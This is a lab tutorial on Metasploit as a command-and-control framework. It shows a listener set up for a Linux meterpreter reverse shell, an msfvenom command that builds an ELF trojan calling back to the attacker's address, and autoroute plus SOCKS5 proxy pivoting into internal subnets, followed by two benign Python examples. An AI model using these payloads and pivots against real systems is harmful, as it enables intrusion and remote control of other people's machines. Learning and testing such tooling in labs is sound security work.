Using MSF (Part 1)

[!Note]
MSF is the C2 framework that ships with Kali. Summed up in one word: good!
As a veteran framework it is naturally well polished. Learning it now also gives me ideas for developing related modules later, and lets me see where it falls short.

Test environment:

Two Kali Linux machines, left brain versus right brain! (one in WSL, one in a VM)
Conveniently, WSL's mirrored networking mode lets the VM reach WSL, while WSL cannot reach the VM directly, which is exactly the use case for a reverse proxy!

The simulated scenario:

The VM is the target machine, running a vulnerable web service; after getting a shell, an msf trojan is uploaded to the server.
WSL plays a C2 controller on the public internet, responsible for post-exploitation of the target.

Let's go!!!

Get onto the box using the webshell as the entry point.

Start the listener in msf:

```
msf6 >
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.17.113.211
LHOST => 172.17.113.211
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
```

Generate the trojan with msfvenom (note that the handler above is set to the staged `meterpreter/reverse_tcp`, while the command below builds the stageless `meterpreter_reverse_tcp`; the handler's payload name should match the one given to msfvenom):

```
┌──(kali㉿Hack3rr)-[~]
└─$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=172.17.113.211 LPORT=4444 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068952 bytes
Final size of elf file: 1068952 bytes
```

Then execute the trojan on the target; once the session comes in, check the routes:

```
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.77.0       255.255.255.0      Session 1
   192.168.207.0      255.255.255.0      Session 1

...

msf6 post(multi/manage/autoroute) > route

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.77.0       255.255.255.0      Session 1
   192.168.207.0      255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.


msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   1080             yes       The port to listen on
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server



View the full module info with the info, or info -d command.
msf6 auxiliary(server/socks_proxy) > jobs

Jobs
====

  Id  Name                         Payload  Payload opts
  --  ----                         -------  ------------
  0   Auxiliary: server/socks_proxy
```
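To make the `route` table above concrete, here is an added example (my own code, not part of Metasploit) that parses that output and answers the question the framework answers for every module it runs: which session, if any, should relay traffic to a given destination. The table text is constructed from the output on this page plus one fictitious `Session 2` entry, and longest-prefix matching is an assumption borrowed from ordinary IP routing rather than something the page states about the framework's tie-breaking.

```python
"""
Parse an msfconsole `route` table and look up the session that would relay
traffic to a destination address. Added example, not Metasploit code.
"""
import ipaddress
import re

# Constructed sample: the two routes from this page plus one extra (fictitious)
# Session 2 route on a narrower subnet, to show longest-prefix selection.
ROUTE_OUTPUT = """
IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.77.0       255.255.255.0      Session 1
   192.168.207.0      255.255.255.0      Session 1
   192.168.207.128    255.255.255.128    Session 2

[*] There are currently no IPv6 routes defined.
"""

# One route line: <subnet> <netmask> Session <id>
ROUTE_RE = re.compile(
    r"^(\d+\.\d+\.\d+\.\d+)\s+(\d+\.\d+\.\d+\.\d+)\s+Session\s+(\d+)\s*$"
)


def parse_routes(text):
    """Return a list of (ip_network, session_id) tuples from `route` output."""
    routes = []
    for line in text.splitlines():
        m = ROUTE_RE.match(line.strip())
        if not m:
            continue  # headers, separators, blank lines, status messages
        net = ipaddress.ip_network(f"{m.group(1)}/{m.group(2)}", strict=False)
        routes.append((net, int(m.group(3))))
    return routes


def session_for(dest, routes):
    """Session id that relays traffic to dest, or None when the C2 host
    would send it out directly (assumed longest-prefix match)."""
    addr = ipaddress.ip_address(dest)
    best = None
    for net, sid in routes:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, sid)
    return best[1] if best else None


if __name__ == "__main__":
    table = parse_routes(ROUTE_OUTPUT)
    for host in ("192.168.77.10", "192.168.207.5", "192.168.207.200", "172.17.113.211"):
        print(host, "->", session_for(host, table))
```

Any destination outside the listed subnets (for example the C2 host's own address 172.17.113.211) yields `None`, meaning no pivot is involved; that is the distinction to keep in mind when reading the SOCKS proxy behaviour that follows.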

That gives us a SOCKS5 proxy. This should be a forward proxy, since the proxy end sits on the attacker side (the client).
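The `options` output above shows the proxy listening on `0.0.0.0:1080` with `USERNAME` and `PASSWORD` unset, so any client that can reach that socket gets a tunnel into the routed subnets. The following added example (my own code, not Metasploit's) models, in memory and without sockets, the SOCKS5 method negotiation (RFC 1928) and the username/password sub-negotiation (RFC 1929) that those two options turn on, so you can see what changes on the wire between the page's open configuration and one that demands credentials. The credential store and the `op`/`s3cret` values are constructed for the demonstration.

```python
"""
In-memory model of SOCKS5 method negotiation (RFC 1928) and username/password
sub-negotiation (RFC 1929). Added example, not Metasploit's implementation.
"""
import hmac

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00        # "no authentication required"
METHOD_USER_PASS = 0x02      # RFC 1929 username/password
METHOD_NO_ACCEPTABLE = 0xFF  # server rejects every offered method
AUTH_VERSION = 0x01          # sub-negotiation version byte
AUTH_SUCCESS = 0x00


def client_greeting(methods):
    """Client -> server: VER | NMETHODS | METHODS[...]"""
    return bytes([SOCKS_VERSION, len(methods)]) + bytes(methods)


def server_select_method(greeting, require_auth):
    """Server -> client: VER | METHOD.
    require_auth mirrors USERNAME/PASSWORD being set on the listener."""
    if len(greeting) < 2 or greeting[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 greeting")
    nmethods = greeting[1]
    methods = greeting[2:2 + nmethods]
    if len(methods) != nmethods:
        raise ValueError("truncated greeting")
    wanted = METHOD_USER_PASS if require_auth else METHOD_NO_AUTH
    chosen = wanted if wanted in methods else METHOD_NO_ACCEPTABLE
    return bytes([SOCKS_VERSION, chosen])


def client_auth_request(username, password):
    """Client -> server (RFC 1929): VER | ULEN | UNAME | PLEN | PASSWD"""
    uname, passwd = username.encode("utf-8"), password.encode("utf-8")
    if not 1 <= len(uname) <= 255 or not 1 <= len(passwd) <= 255:
        raise ValueError("username and password must be 1..255 bytes")
    return bytes([AUTH_VERSION, len(uname)]) + uname + bytes([len(passwd)]) + passwd


def server_auth_reply(request, credentials):
    """Server -> client: VER | STATUS (0x00 success; anything else means the
    server closes the connection). credentials is a {username: password} dict."""
    if len(request) < 2 or request[0] != AUTH_VERSION:
        raise ValueError("bad auth sub-negotiation version")
    ulen = request[1]
    uname = request[2:2 + ulen]
    plen_pos = 2 + ulen
    if len(uname) != ulen or len(request) <= plen_pos:
        raise ValueError("truncated auth request")
    plen = request[plen_pos]
    passwd = request[plen_pos + 1:plen_pos + 1 + plen]
    if len(passwd) != plen:
        raise ValueError("truncated auth request")
    expected = credentials.get(uname.decode("utf-8", "replace"))
    # Constant-time compare so reply timing does not reveal how much of the password matched.
    ok = expected is not None and hmac.compare_digest(expected.encode("utf-8"), passwd)
    return bytes([AUTH_VERSION, AUTH_SUCCESS if ok else 0x01])


def negotiate(offered, require_auth, credentials=None, username=None, password=None):
    """Drive both sides in memory. Returns (method chosen by the server,
    whether the client may go on to send a CONNECT request)."""
    method = server_select_method(client_greeting(offered), require_auth)[1]
    if method == METHOD_NO_ACCEPTABLE:
        return method, False   # server drops the connection
    if method == METHOD_NO_AUTH:
        return method, True    # the page's configuration: nobody is asked for credentials
    reply = server_auth_reply(client_auth_request(username, password), credentials or {})
    return method, reply[1] == AUTH_SUCCESS


if __name__ == "__main__":
    store = {"op": "s3cret"}  # constructed credential store
    print("open listener, anonymous client :", negotiate([METHOD_NO_AUTH], False))
    print("auth required, anonymous client :", negotiate([METHOD_NO_AUTH], True))
    print("auth required, good password    :", negotiate([METHOD_USER_PASS], True, store, "op", "s3cret"))
    print("auth required, bad password     :", negotiate([METHOD_USER_PASS], True, store, "op", "wrong"))
</test>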

Reference: "Proxy forwarding in intranet penetration" - FreeBuf (network security industry portal)